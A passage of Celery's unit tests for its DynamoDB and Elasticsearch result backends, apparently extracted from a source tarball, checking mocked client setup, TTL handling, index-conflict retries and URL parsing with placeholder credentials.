DynamoDBBackend( app=self.app, url='dynamodb://@us-east-1' ) client = backend._get_client() assert backend.client is client mock_boto_client.assert_called_once_with( 'dynamodb', endpoint_url='http://my.domain.com:666', region_name='us-east-1' ) assert backend.endpoint_url == 'http://my.domain.com:666' def test_get_client_local(self): table_creation_path = \ 'celery.backends.dynamodb.DynamoDBBackend._get_or_create_table' with patch('boto3.client') as mock_boto_client, \ patch(table_creation_path): backend = DynamoDBBackend( app=self.app, url='dynamodb://@localhost:8000' ) client = backend._get_client() assert backend.client is client mock_boto_client.assert_called_once_with( 'dynamodb', endpoint_url='http://localhost:8000', region_name='us-east-1' ) assert backend.endpoint_url == 'http://localhost:8000' def test_get_client_credentials(self): table_creation_path = \ 'celery.backends.dynamodb.DynamoDBBackend._get_or_create_table' with patch('boto3.client') as mock_boto_client, \ patch(table_creation_path): backend = DynamoDBBackend( app=self.app, url='dynamodb://key:secret@test' ) client = backend._get_client() assert client is backend.client mock_boto_client.assert_called_once_with( 'dynamodb', aws_access_key_id='key', aws_secret_access_key='secret', region_name='test' ) assert backend.aws_region == 'test' @patch('boto3.client') @patch('celery.backends.dynamodb.DynamoDBBackend._get_or_create_table') @patch('celery.backends.dynamodb.DynamoDBBackend._validate_ttl_methods') @patch('celery.backends.dynamodb.DynamoDBBackend._set_table_ttl') def test_get_client_time_to_live_called( self, mock_set_table_ttl, mock_validate_ttl_methods, mock_get_or_create_table, mock_boto_client, ): backend = DynamoDBBackend( app=self.app, url='dynamodb://key:secret@test?ttl_seconds=30' ) backend._get_client() mock_validate_ttl_methods.assert_called_once() mock_set_table_ttl.assert_called_once() def test_get_or_create_table_not_exists(self): self.backend._client = MagicMock() mock_create_table = self.backend._client.create_table = MagicMock() mock_describe_table = self.backend._client.describe_table = \ MagicMock() mock_describe_table.return_value = { 'Table': { 'TableStatus': 'ACTIVE' } } self.backend._get_or_create_table() mock_create_table.assert_called_once_with( **self.backend._get_table_schema() ) def test_get_or_create_table_already_exists(self): from botocore.exceptions import ClientError self.backend._client = MagicMock() mock_create_table = self.backend._client.create_table = MagicMock() client_error = ClientError( { 'Error': { 'Code': 'ResourceInUseException', 'Message': 'Table already exists: {}'.format( self.backend.table_name ) } }, 'CreateTable' ) mock_create_table.side_effect = client_error mock_describe_table = self.backend._client.describe_table = \ MagicMock() mock_describe_table.return_value = { 'Table': { 'TableStatus': 'ACTIVE' } } self.backend._get_or_create_table() mock_describe_table.assert_called_once_with( TableName=self.backend.table_name ) def test_wait_for_table_status(self): self.backend._client = MagicMock() mock_describe_table = self.backend._client.describe_table = \ MagicMock() mock_describe_table.side_effect = [ {'Table': { 'TableStatus': 'CREATING' }}, {'Table': { 'TableStatus': 'SOME_STATE' }} ] self.backend._wait_for_table_status(expected='SOME_STATE') assert mock_describe_table.call_count == 2 def test_has_ttl_none_returns_none(self): self.backend.time_to_live_seconds = None assert self.backend._has_ttl() is None def test_has_ttl_lt_zero_returns_false(self): self.backend.time_to_live_seconds = -1 assert self.backend._has_ttl() is False def test_has_ttl_gte_zero_returns_true(self): self.backend.time_to_live_seconds = 30 assert self.backend._has_ttl() is True def test_validate_ttl_methods_present_returns_none(self): self.backend._client = MagicMock() assert self.backend._validate_ttl_methods() is None def test_validate_ttl_methods_missing_raise(self): self.backend._client = MagicMock() delattr(self.backend._client, 'describe_time_to_live') delattr(self.backend._client, 'update_time_to_live') with pytest.raises(AttributeError): self.backend._validate_ttl_methods() with pytest.raises(AttributeError): self.backend._validate_ttl_methods() def test_set_table_ttl_describe_time_to_live_fails_raises(self): from botocore.exceptions import ClientError self.backend.time_to_live_seconds = -1 self.backend._client = MagicMock() mock_describe_time_to_live = \ self.backend._client.describe_time_to_live = MagicMock() client_error = ClientError( { 'Error': { 'Code': 'Foo', 'Message': 'Bar', } }, 'DescribeTimeToLive' ) mock_describe_time_to_live.side_effect = client_error with pytest.raises(ClientError): self.backend._set_table_ttl() def test_set_table_ttl_enable_when_disabled_succeeds(self): self.backend.time_to_live_seconds = 30 self.backend._client = MagicMock() mock_update_time_to_live = self.backend._client.update_time_to_live = \ MagicMock() mock_describe_time_to_live = \ self.backend._client.describe_time_to_live = MagicMock() mock_describe_time_to_live.return_value = { 'TimeToLiveDescription': { 'TimeToLiveStatus': 'DISABLED', 'AttributeName': self.backend._ttl_field.name } } self.backend._set_table_ttl() mock_describe_time_to_live.assert_called_once_with( TableName=self.backend.table_name ) mock_update_time_to_live.assert_called_once() def test_set_table_ttl_enable_when_enabled_with_correct_attr_succeeds(self): self.backend.time_to_live_seconds = 30 self.backend._client = MagicMock() self.backend._client.update_time_to_live = MagicMock() mock_describe_time_to_live = \ self.backend._client.describe_time_to_live = MagicMock() mock_describe_time_to_live.return_value = { 'TimeToLiveDescription': { 'TimeToLiveStatus': 'ENABLED', 'AttributeName': self.backend._ttl_field.name } } self.backend._set_table_ttl() mock_describe_time_to_live.assert_called_once_with( TableName=self.backend.table_name ) def test_set_table_ttl_enable_when_currently_disabling_raises(self): from botocore.exceptions import ClientError self.backend.time_to_live_seconds = 30 self.backend._client = MagicMock() mock_update_time_to_live = self.backend._client.update_time_to_live = \ MagicMock() client_error = ClientError( { 'Error': { 'Code': 'ValidationException', 'Message': ( 'Time to live has been modified multiple times ' 'within a fixed interval' ) } }, 'UpdateTimeToLive' ) mock_update_time_to_live.side_effect = client_error mock_describe_time_to_live = \ self.backend._client.describe_time_to_live = MagicMock() mock_describe_time_to_live.return_value = { 'TimeToLiveDescription': { 'TimeToLiveStatus': 'DISABLING', 'AttributeName': self.backend._ttl_field.name } } with pytest.raises(ClientError): self.backend._set_table_ttl() def test_set_table_ttl_enable_when_enabled_with_wrong_attr_raises(self): from botocore.exceptions import ClientError self.backend.time_to_live_seconds = 30 self.backend._client = MagicMock() mock_update_time_to_live = self.backend._client.update_time_to_live = \ MagicMock() wrong_attr_name = self.backend._ttl_field.name + 'x' client_error = ClientError( { 'Error': { 'Code': 'ValidationException', 'Message': ( 'TimeToLive is active on a different AttributeName: ' 'current AttributeName is {}' ).format(wrong_attr_name) } }, 'UpdateTimeToLive' ) mock_update_time_to_live.side_effect = client_error mock_describe_time_to_live = \ self.backend._client.describe_time_to_live = MagicMock() mock_describe_time_to_live.return_value = { 'TimeToLiveDescription': { 'TimeToLiveStatus': 'ENABLED', 'AttributeName': self.backend._ttl_field.name + 'x' } } with pytest.raises(ClientError): self.backend._set_table_ttl() def test_set_table_ttl_disable_when_disabled_succeeds(self): self.backend.time_to_live_seconds = -1 self.backend._client = MagicMock() self.backend._client.update_time_to_live = MagicMock() mock_describe_time_to_live = \ self.backend._client.describe_time_to_live = MagicMock() mock_describe_time_to_live.return_value = { 'TimeToLiveDescription': { 'TimeToLiveStatus': 'DISABLED' } } self.backend._set_table_ttl() mock_describe_time_to_live.assert_called_once_with( TableName=self.backend.table_name ) def test_set_table_ttl_disable_when_currently_enabling_raises(self): from botocore.exceptions import ClientError self.backend.time_to_live_seconds = -1 self.backend._client = MagicMock() mock_update_time_to_live = self.backend._client.update_time_to_live = \ MagicMock() client_error = ClientError( { 'Error': { 'Code': 'ValidationException', 'Message': ( 'Time to live has been modified multiple times ' 'within a fixed interval' ) } }, 'UpdateTimeToLive' ) mock_update_time_to_live.side_effect = client_error mock_describe_time_to_live = \ self.backend._client.describe_time_to_live = MagicMock() mock_describe_time_to_live.return_value = { 'TimeToLiveDescription': { 'TimeToLiveStatus': 'ENABLING', 'AttributeName': self.backend._ttl_field.name } } with pytest.raises(ClientError): self.backend._set_table_ttl() def test_prepare_get_request(self): expected = { 'TableName': 'celery', 'Key': {'id': {'S': 'abcdef'}} } assert self.backend._prepare_get_request('abcdef') == expected def test_prepare_put_request(self): expected = { 'TableName': 'celery', 'Item': { 'id': {'S': 'abcdef'}, 'result': {'B': 'val'}, 'timestamp': { 'N': str(Decimal(self._static_timestamp)) } } } with patch('celery.backends.dynamodb.time', self._mock_time): result = self.backend._prepare_put_request('abcdef', 'val') assert result == expected def test_prepare_put_request_with_ttl(self): ttl = self.backend.time_to_live_seconds = 30 expected = { 'TableName': 'celery', 'Item': { 'id': {'S': 'abcdef'}, 'result': {'B': 'val'}, 'timestamp': { 'N': str(Decimal(self._static_timestamp)) }, 'ttl': { 'N': str(int(self._static_timestamp + ttl)) } } } with patch('celery.backends.dynamodb.time', self._mock_time): result = self.backend._prepare_put_request('abcdef', 'val') assert result == expected def test_item_to_dict(self): boto_response = { 'Item': { 'id': { 'S': sentinel.key }, 'result': { 'B': sentinel.value }, 'timestamp': { 'N': Decimal(1) } } } converted = self.backend._item_to_dict(boto_response) assert converted == { 'id': sentinel.key, 'result': sentinel.value, 'timestamp': Decimal(1) } def test_get(self): self.backend._client = Mock(name='_client') self.backend._client.get_item = MagicMock() assert self.backend.get('1f3fab') is None self.backend.client.get_item.assert_called_once_with( Key={'id': {'S': '1f3fab'}}, TableName='celery' ) def _mock_time(self): return self._static_timestamp def test_set(self): self.backend._client = MagicMock() self.backend._client.put_item = MagicMock() # should return None with patch('celery.backends.dynamodb.time', self._mock_time): assert self.backend._set_with_state(sentinel.key, sentinel.value, states.SUCCESS) is None assert self.backend._client.put_item.call_count == 1 _, call_kwargs = self.backend._client.put_item.call_args expected_kwargs = { 'Item': { 'timestamp': {'N': str(self._static_timestamp)}, 'id': {'S': str(sentinel.key)}, 'result': {'B': sentinel.value} }, 'TableName': 'celery' } assert call_kwargs['Item'] == expected_kwargs['Item'] assert call_kwargs['TableName'] == 'celery' def test_set_with_ttl(self): ttl = self.backend.time_to_live_seconds = 30 self.backend._client = MagicMock() self.backend._client.put_item = MagicMock() # should return None with patch('celery.backends.dynamodb.time', self._mock_time): assert self.backend._set_with_state(sentinel.key, sentinel.value, states.SUCCESS) is None assert self.backend._client.put_item.call_count == 1 _, call_kwargs = self.backend._client.put_item.call_args expected_kwargs = { 'Item': { 'timestamp': {'N': str(self._static_timestamp)}, 'id': {'S': str(sentinel.key)}, 'result': {'B': sentinel.value}, 'ttl': {'N': str(int(self._static_timestamp + ttl))}, }, 'TableName': 'celery' } assert call_kwargs['Item'] == expected_kwargs['Item'] assert call_kwargs['TableName'] == 'celery' def test_delete(self): self.backend._client = Mock(name='_client') mocked_delete = self.backend._client.delete = Mock('client.delete') mocked_delete.return_value = None # should return None assert self.backend.delete('1f3fab') is None self.backend.client.delete_item.assert_called_once_with( Key={'id': {'S': '1f3fab'}}, TableName='celery' ) def test_backend_by_url(self, url='dynamodb://'): from celery.app import backends from celery.backends.dynamodb import DynamoDBBackend backend, url_ = backends.by_url(url, self.app.loader) assert backend is DynamoDBBackend assert url_ == url def test_backend_params_by_url(self): self.app.conf.result_backend = ( 'dynamodb://@us-east-1/celery_results' '?read=10' '&write=20' '&ttl_seconds=600' ) assert self.backend.aws_region == 'us-east-1' assert self.backend.table_name == 'celery_results' assert self.backend.read_capacity_units == 10 assert self.backend.write_capacity_units == 20 assert self.backend.time_to_live_seconds == 600 assert self.backend.endpoint_url is None ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/t/unit/backends/test_elasticsearch.py0000664000175000017500000007752200000000000022131 0ustar00asifasif00000000000000import datetime from unittest.mock import Mock, call, patch, sentinel import pytest from billiard.einfo import ExceptionInfo from kombu.utils.encoding import bytes_to_str from celery import states try: from elasticsearch import exceptions except ImportError: exceptions = None from celery.app import backends from celery.backends import elasticsearch as module from celery.backends.elasticsearch import ElasticsearchBackend from celery.exceptions import ImproperlyConfigured _RESULT_RETRY = ( '{"status":"RETRY","result":' '{"exc_type":"Exception","exc_message":["failed"],"exc_module":"builtins"}}' ) _RESULT_FAILURE = ( '{"status":"FAILURE","result":' '{"exc_type":"Exception","exc_message":["failed"],"exc_module":"builtins"}}' ) pytest.importorskip('elasticsearch') class test_ElasticsearchBackend: def setup(self): self.backend = ElasticsearchBackend(app=self.app) def test_init_no_elasticsearch(self): prev, module.elasticsearch = module.elasticsearch, None try: with pytest.raises(ImproperlyConfigured): ElasticsearchBackend(app=self.app) finally: module.elasticsearch = prev def test_get(self): x = ElasticsearchBackend(app=self.app) x._server = Mock() x._server.get = Mock() # expected result r = {'found': True, '_source': {'result': sentinel.result}} x._server.get.return_value = r dict_result = x.get(sentinel.task_id) assert dict_result == sentinel.result x._server.get.assert_called_once_with( doc_type=x.doc_type, id=sentinel.task_id, index=x.index, ) def test_get_none(self): x = ElasticsearchBackend(app=self.app) x._server = Mock() x._server.get = Mock() x._server.get.return_value = sentinel.result none_result = x.get(sentinel.task_id) assert none_result is None x._server.get.assert_called_once_with( doc_type=x.doc_type, id=sentinel.task_id, index=x.index, ) def test_get_task_not_found(self): x = ElasticsearchBackend(app=self.app) x._server = Mock() x._server.get.side_effect = [ exceptions.NotFoundError(404, '{"_index":"celery","_type":"_doc","_id":"toto","found":false}', {'_index': 'celery', '_type': '_doc', '_id': 'toto', 'found': False}) ] res = x.get(sentinel.task_id) assert res is None def test_get_task_not_found_without_throw(self): x = ElasticsearchBackend(app=self.app) x._server = Mock() # this should not happen as if not found elasticsearch python library # will raise elasticsearch.exceptions.NotFoundError. x._server.get.return_value = {'_index': 'celery', '_type': '_doc', '_id': 'toto', 'found': False} res = x.get(sentinel.task_id) assert res is None def test_delete(self): x = ElasticsearchBackend(app=self.app) x._server = Mock() x._server.delete = Mock() x._server.delete.return_value = sentinel.result assert x.delete(sentinel.task_id) is None x._server.delete.assert_called_once_with( doc_type=x.doc_type, id=sentinel.task_id, index=x.index, ) def test_backend_by_url(self, url='elasticsearch://localhost:9200/index'): backend, url_ = backends.by_url(url, self.app.loader) assert backend is ElasticsearchBackend assert url_ == url @patch('celery.backends.elasticsearch.datetime') def test_index_conflict(self, datetime_mock): expected_dt = datetime.datetime(2020, 6, 1, 18, 43, 24, 123456, None) datetime_mock.utcnow.return_value = expected_dt x = ElasticsearchBackend(app=self.app) x._server = Mock() x._server.index.side_effect = [ exceptions.ConflictError(409, "concurrent update", {}) ] x._server.get.return_value = { 'found': True, '_source': {"result": _RESULT_RETRY}, '_seq_no': 2, '_primary_term': 1, } x._server.update.return_value = { 'result': 'updated' } x._set_with_state(sentinel.task_id, sentinel.result, sentinel.state) assert x._server.get.call_count == 1 x._server.index.assert_called_once_with( id=sentinel.task_id, index=x.index, doc_type=x.doc_type, body={'result': sentinel.result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z'}, params={'op_type': 'create'}, ) x._server.update.assert_called_once_with( id=sentinel.task_id, index=x.index, doc_type=x.doc_type, body={'doc': {'result': sentinel.result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z'}}, params={'if_seq_no': 2, 'if_primary_term': 1} ) @patch('celery.backends.elasticsearch.datetime') def test_index_conflict_without_state(self, datetime_mock): expected_dt = datetime.datetime(2020, 6, 1, 18, 43, 24, 123456, None) datetime_mock.utcnow.return_value = expected_dt x = ElasticsearchBackend(app=self.app) x._server = Mock() x._server.index.side_effect = [ exceptions.ConflictError(409, "concurrent update", {}) ] x._server.get.return_value = { 'found': True, '_source': {"result": _RESULT_RETRY}, '_seq_no': 2, '_primary_term': 1, } x._server.update.return_value = { 'result': 'updated' } x.set(sentinel.task_id, sentinel.result) assert x._server.get.call_count == 1 x._server.index.assert_called_once_with( id=sentinel.task_id, index=x.index, doc_type=x.doc_type, body={'result': sentinel.result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z'}, params={'op_type': 'create'}, ) x._server.update.assert_called_once_with( id=sentinel.task_id, index=x.index, doc_type=x.doc_type, body={'doc': {'result': sentinel.result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z'}}, params={'if_seq_no': 2, 'if_primary_term': 1} ) @patch('celery.backends.elasticsearch.datetime') def test_index_conflict_with_ready_state_on_backend_without_state(self, datetime_mock): """Even if the backend already have a ready state saved (FAILURE in this test case) as we are calling ElasticsearchBackend.set directly, it does not have state, so it cannot protect overriding a ready state by any other state. As a result, server.update will be called no matter what. """ expected_dt = datetime.datetime(2020, 6, 1, 18, 43, 24, 123456, None) datetime_mock.utcnow.return_value = expected_dt x = ElasticsearchBackend(app=self.app) x._server = Mock() x._server.index.side_effect = [ exceptions.ConflictError(409, "concurrent update", {}) ] x._server.get.return_value = { 'found': True, '_source': {"result": _RESULT_FAILURE}, '_seq_no': 2, '_primary_term': 1, } x._server.update.return_value = { 'result': 'updated' } x.set(sentinel.task_id, sentinel.result) assert x._server.get.call_count == 1 x._server.index.assert_called_once_with( id=sentinel.task_id, index=x.index, doc_type=x.doc_type, body={'result': sentinel.result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z'}, params={'op_type': 'create'}, ) x._server.update.assert_called_once_with( id=sentinel.task_id, index=x.index, doc_type=x.doc_type, body={'doc': {'result': sentinel.result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z'}}, params={'if_seq_no': 2, 'if_primary_term': 1} ) @patch('celery.backends.elasticsearch.datetime') def test_index_conflict_with_existing_success(self, datetime_mock): expected_dt = datetime.datetime(2020, 6, 1, 18, 43, 24, 123456, None) datetime_mock.utcnow.return_value = expected_dt x = ElasticsearchBackend(app=self.app) x._server = Mock() x._server.index.side_effect = [ exceptions.ConflictError(409, "concurrent update", {}) ] x._server.get.return_value = { 'found': True, '_source': { 'result': """{"status":"SUCCESS","result":42}""" }, '_seq_no': 2, '_primary_term': 1, } x._server.update.return_value = { 'result': 'updated' } x._set_with_state(sentinel.task_id, sentinel.result, sentinel.state) assert x._server.get.call_count == 1 x._server.index.assert_called_once_with( id=sentinel.task_id, index=x.index, doc_type=x.doc_type, body={'result': sentinel.result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z'}, params={'op_type': 'create'}, ) x._server.update.assert_not_called() @patch('celery.backends.elasticsearch.datetime') def test_index_conflict_with_existing_ready_state(self, datetime_mock): expected_dt = datetime.datetime(2020, 6, 1, 18, 43, 24, 123456, None) datetime_mock.utcnow.return_value = expected_dt x = ElasticsearchBackend(app=self.app) x._server = Mock() x._server.index.side_effect = [ exceptions.ConflictError(409, "concurrent update", {}) ] x._server.get.return_value = { 'found': True, '_source': {"result": _RESULT_FAILURE}, '_seq_no': 2, '_primary_term': 1, } x._server.update.return_value = { 'result': 'updated' } x._set_with_state(sentinel.task_id, sentinel.result, states.RETRY) assert x._server.get.call_count == 1 x._server.index.assert_called_once_with( id=sentinel.task_id, index=x.index, doc_type=x.doc_type, body={'result': sentinel.result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z'}, params={'op_type': 'create'}, ) x._server.update.assert_not_called() @patch('celery.backends.elasticsearch.datetime') @patch('celery.backends.base.datetime') def test_backend_concurrent_update(self, base_datetime_mock, es_datetime_mock): expected_dt = datetime.datetime(2020, 6, 1, 18, 43, 24, 123456, None) es_datetime_mock.utcnow.return_value = expected_dt expected_done_dt = datetime.datetime(2020, 6, 1, 18, 45, 34, 654321, None) base_datetime_mock.utcnow.return_value = expected_done_dt self.app.conf.result_backend_always_retry, prev = True, self.app.conf.result_backend_always_retry x_server_get_side_effect = [ { 'found': True, '_source': {'result': _RESULT_RETRY}, '_seq_no': 2, '_primary_term': 1, }, { 'found': True, '_source': {'result': _RESULT_RETRY}, '_seq_no': 2, '_primary_term': 1, }, { 'found': True, '_source': {'result': _RESULT_FAILURE}, '_seq_no': 3, '_primary_term': 1, }, { 'found': True, '_source': {'result': _RESULT_FAILURE}, '_seq_no': 3, '_primary_term': 1, }, ] try: x = ElasticsearchBackend(app=self.app) task_id = str(sentinel.task_id) encoded_task_id = bytes_to_str(x.get_key_for_task(task_id)) result = str(sentinel.result) sleep_mock = Mock() x._sleep = sleep_mock x._server = Mock() x._server.index.side_effect = exceptions.ConflictError(409, "concurrent update", {}) x._server.get.side_effect = x_server_get_side_effect x._server.update.side_effect = [ {'result': 'noop'}, {'result': 'updated'} ] result_meta = x._get_result_meta(result, states.SUCCESS, None, None) result_meta['task_id'] = bytes_to_str(task_id) expected_result = x.encode(result_meta) x.store_result(task_id, result, states.SUCCESS) x._server.index.assert_has_calls([ call( id=encoded_task_id, index=x.index, doc_type=x.doc_type, body={ 'result': expected_result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z' }, params={'op_type': 'create'} ), call( id=encoded_task_id, index=x.index, doc_type=x.doc_type, body={ 'result': expected_result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z' }, params={'op_type': 'create'} ), ]) x._server.update.assert_has_calls([ call( id=encoded_task_id, index=x.index, doc_type=x.doc_type, body={ 'doc': { 'result': expected_result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z' } }, params={'if_seq_no': 2, 'if_primary_term': 1} ), call( id=encoded_task_id, index=x.index, doc_type=x.doc_type, body={ 'doc': { 'result': expected_result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z' } }, params={'if_seq_no': 3, 'if_primary_term': 1} ), ]) assert sleep_mock.call_count == 1 finally: self.app.conf.result_backend_always_retry = prev @patch('celery.backends.elasticsearch.datetime') @patch('celery.backends.base.datetime') def test_backend_index_conflicting_document_removed(self, base_datetime_mock, es_datetime_mock): expected_dt = datetime.datetime(2020, 6, 1, 18, 43, 24, 123456, None) es_datetime_mock.utcnow.return_value = expected_dt expected_done_dt = datetime.datetime(2020, 6, 1, 18, 45, 34, 654321, None) base_datetime_mock.utcnow.return_value = expected_done_dt self.app.conf.result_backend_always_retry, prev = True, self.app.conf.result_backend_always_retry try: x = ElasticsearchBackend(app=self.app) task_id = str(sentinel.task_id) encoded_task_id = bytes_to_str(x.get_key_for_task(task_id)) result = str(sentinel.result) sleep_mock = Mock() x._sleep = sleep_mock x._server = Mock() x._server.index.side_effect = [ exceptions.ConflictError(409, "concurrent update", {}), {'result': 'created'} ] x._server.get.side_effect = [ { 'found': True, '_source': {"result": _RESULT_RETRY}, '_seq_no': 2, '_primary_term': 1, }, exceptions.NotFoundError(404, '{"_index":"celery","_type":"_doc","_id":"toto","found":false}', {'_index': 'celery', '_type': '_doc', '_id': 'toto', 'found': False}), ] result_meta = x._get_result_meta(result, states.SUCCESS, None, None) result_meta['task_id'] = bytes_to_str(task_id) expected_result = x.encode(result_meta) x.store_result(task_id, result, states.SUCCESS) x._server.index.assert_has_calls([ call( id=encoded_task_id, index=x.index, doc_type=x.doc_type, body={ 'result': expected_result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z' }, params={'op_type': 'create'} ), call( id=encoded_task_id, index=x.index, doc_type=x.doc_type, body={ 'result': expected_result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z' }, params={'op_type': 'create'} ), ]) x._server.update.assert_not_called() sleep_mock.assert_not_called() finally: self.app.conf.result_backend_always_retry = prev @patch('celery.backends.elasticsearch.datetime') @patch('celery.backends.base.datetime') def test_backend_index_conflicting_document_removed_not_throwing(self, base_datetime_mock, es_datetime_mock): expected_dt = datetime.datetime(2020, 6, 1, 18, 43, 24, 123456, None) es_datetime_mock.utcnow.return_value = expected_dt expected_done_dt = datetime.datetime(2020, 6, 1, 18, 45, 34, 654321, None) base_datetime_mock.utcnow.return_value = expected_done_dt self.app.conf.result_backend_always_retry, prev = True, self.app.conf.result_backend_always_retry try: x = ElasticsearchBackend(app=self.app) task_id = str(sentinel.task_id) encoded_task_id = bytes_to_str(x.get_key_for_task(task_id)) result = str(sentinel.result) sleep_mock = Mock() x._sleep = sleep_mock x._server = Mock() x._server.index.side_effect = [ exceptions.ConflictError(409, "concurrent update", {}), {'result': 'created'} ] x._server.get.side_effect = [ { 'found': True, '_source': {'result': _RESULT_RETRY}, '_seq_no': 2, '_primary_term': 1, }, {'_index': 'celery', '_type': '_doc', '_id': 'toto', 'found': False}, ] result_meta = x._get_result_meta(result, states.SUCCESS, None, None) result_meta['task_id'] = bytes_to_str(task_id) expected_result = x.encode(result_meta) x.store_result(task_id, result, states.SUCCESS) x._server.index.assert_has_calls([ call( id=encoded_task_id, index=x.index, doc_type=x.doc_type, body={ 'result': expected_result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z' }, params={'op_type': 'create'} ), call( id=encoded_task_id, index=x.index, doc_type=x.doc_type, body={ 'result': expected_result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z' }, params={'op_type': 'create'} ), ]) x._server.update.assert_not_called() sleep_mock.assert_not_called() finally: self.app.conf.result_backend_always_retry = prev @patch('celery.backends.elasticsearch.datetime') @patch('celery.backends.base.datetime') def test_backend_index_corrupted_conflicting_document(self, base_datetime_mock, es_datetime_mock): expected_dt = datetime.datetime(2020, 6, 1, 18, 43, 24, 123456, None) es_datetime_mock.utcnow.return_value = expected_dt expected_done_dt = datetime.datetime(2020, 6, 1, 18, 45, 34, 654321, None) base_datetime_mock.utcnow.return_value = expected_done_dt # self.app.conf.result_backend_always_retry, prev = True, self.app.conf.result_backend_always_retry # try: x = ElasticsearchBackend(app=self.app) task_id = str(sentinel.task_id) encoded_task_id = bytes_to_str(x.get_key_for_task(task_id)) result = str(sentinel.result) sleep_mock = Mock() x._sleep = sleep_mock x._server = Mock() x._server.index.side_effect = [ exceptions.ConflictError(409, "concurrent update", {}) ] x._server.update.side_effect = [ {'result': 'updated'} ] x._server.get.return_value = { 'found': True, '_source': {}, '_seq_no': 2, '_primary_term': 1, } result_meta = x._get_result_meta(result, states.SUCCESS, None, None) result_meta['task_id'] = bytes_to_str(task_id) expected_result = x.encode(result_meta) x.store_result(task_id, result, states.SUCCESS) x._server.index.assert_called_once_with( id=encoded_task_id, index=x.index, doc_type=x.doc_type, body={ 'result': expected_result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z' }, params={'op_type': 'create'} ) x._server.update.assert_called_once_with( id=encoded_task_id, index=x.index, doc_type=x.doc_type, body={ 'doc': { 'result': expected_result, '@timestamp': expected_dt.isoformat()[:-3] + 'Z' } }, params={'if_primary_term': 1, 'if_seq_no': 2} ) sleep_mock.assert_not_called() def test_backend_params_by_url(self): url = 'elasticsearch://localhost:9200/index/doc_type' with self.Celery(backend=url) as app: x = app.backend assert x.index == 'index' assert x.doc_type == 'doc_type' assert x.scheme == 'http' assert x.host == 'localhost' assert x.port == 9200 def test_backend_url_no_params(self): url = 'elasticsearch:///' with self.Celery(backend=url) as app: x = app.backend assert x.index == 'celery' assert x.doc_type == 'backend' assert x.scheme == 'http' assert x.host == 'localhost' assert x.port == 9200 @patch('elasticsearch.Elasticsearch') def test_get_server_with_auth(self, mock_es_client): url = 'elasticsearch+https://fake_user:fake_pass@localhost:9200/index/doc_type' with self.Celery(backend=url) as app: x = app.backend assert x.username == 'fake_user' assert x.password == 'fake_pass' assert x.scheme == 'https' x._get_server() mock_es_client.assert_called_once_with( 'localhost:9200', http_auth=('fake_user', 'fake_pass'), max_retries=x.es_max_retries, retry_on_timeout=x.es_retry_on_timeout, scheme='https', timeout=x.es_timeout, ) @patch('elasticsearch.Elasticsearch') def test_get_server_without_auth(self, mock_es_client): url = 'elasticsearch://localhost:9200/index/doc_type' with self.Celery(backend=url) as app: x = app.backend x._get_server() mock_es_client.assert_called_once_with( 'localhost:9200', http_auth=None, max_retries=x.es_max_retries, retry_on_timeout=x.es_retry_on_timeout, scheme='http', timeout=x.es_timeout, ) def test_index(self): x = ElasticsearchBackend(app=self.app) x.doc_type = 'test-doc-type' x._server = Mock() x._server.index = Mock() expected_result = { '_id': sentinel.task_id, '_source': {'result': sentinel.result} } x._server.index.return_value = expected_result body = {"field1": "value1"} x._index( id=str(sentinel.task_id).encode(), body=body, kwarg1='test1' ) x._server.index.assert_called_once_with( id=str(sentinel.task_id), doc_type=x.doc_type, index=x.index, body=body, params={'op_type': 'create'}, kwarg1='test1' ) def test_index_bytes_key(self): x = ElasticsearchBackend(app=self.app) x.doc_type = 'test-doc-type' x._server = Mock() x._server.index = Mock() expected_result = { '_id': sentinel.task_id, '_source': {'result': sentinel.result} } x._server.index.return_value = expected_result body = {b"field1": "value1"} x._index( id=str(sentinel.task_id).encode(), body=body, kwarg1='test1' ) x._server.index.assert_called_once_with( id=str(sentinel.task_id), doc_type=x.doc_type, index=x.index, body={"field1": "value1"}, params={'op_type': 'create'}, kwarg1='test1' ) def test_encode_as_json(self): self.app.conf.elasticsearch_save_meta_as_text, prev = False, self.app.conf.elasticsearch_save_meta_as_text try: x = ElasticsearchBackend(app=self.app) result_meta = x._get_result_meta({'solution': 42}, states.SUCCESS, None, None) assert x.encode(result_meta) == result_meta finally: self.app.conf.elasticsearch_save_meta_as_text = prev def test_encode_none_as_json(self): self.app.conf.elasticsearch_save_meta_as_text, prev = False, self.app.conf.elasticsearch_save_meta_as_text try: x = ElasticsearchBackend(app=self.app) result_meta = x._get_result_meta(None, states.SUCCESS, None, None) assert x.encode(result_meta) == result_meta finally: self.app.conf.elasticsearch_save_meta_as_text = prev def test_encode_exception_as_json(self): self.app.conf.elasticsearch_save_meta_as_text, prev = False, self.app.conf.elasticsearch_save_meta_as_text try: x = ElasticsearchBackend(app=self.app) try: raise Exception("failed") except Exception as exc: einfo = ExceptionInfo() result_meta = x._get_result_meta( x.encode_result(exc, states.FAILURE), states.FAILURE, einfo.traceback, None, ) assert x.encode(result_meta) == result_meta finally: self.app.conf.elasticsearch_save_meta_as_text = prev def test_decode_from_json(self): self.app.conf.elasticsearch_save_meta_as_text, prev = False, self.app.conf.elasticsearch_save_meta_as_text try: x = ElasticsearchBackend(app=self.app) result_meta = x._get_result_meta({'solution': 42}, states.SUCCESS, None, None) result_meta['result'] = x._encode(result_meta['result'])[2] assert x.decode(result_meta) == result_meta finally: self.app.conf.elasticsearch_save_meta_as_text = prev def test_decode_none_from_json(self): self.app.conf.elasticsearch_save_meta_as_text, prev = False, self.app.conf.elasticsearch_save_meta_as_text try: x = ElasticsearchBackend(app=self.app) result_meta = x._get_result_meta(None, states.SUCCESS, None, None) # result_meta['result'] = x._encode(result_meta['result'])[2] 